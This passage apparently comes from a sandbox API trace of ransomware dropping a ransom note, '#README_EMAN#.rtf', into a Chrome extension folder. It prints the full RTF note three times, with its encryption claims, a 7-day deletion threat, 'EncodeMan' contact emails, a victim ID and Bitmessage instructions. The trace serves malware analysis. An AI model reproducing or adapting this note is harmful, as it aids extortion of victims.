lpOverlapped=0x0) returned 1 [0273.358] CloseHandle (hObject=0x294) returned 1 [0273.358] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0273.358] GetLastError () returned 0x2 [0273.358] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.359] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.359] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.359] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 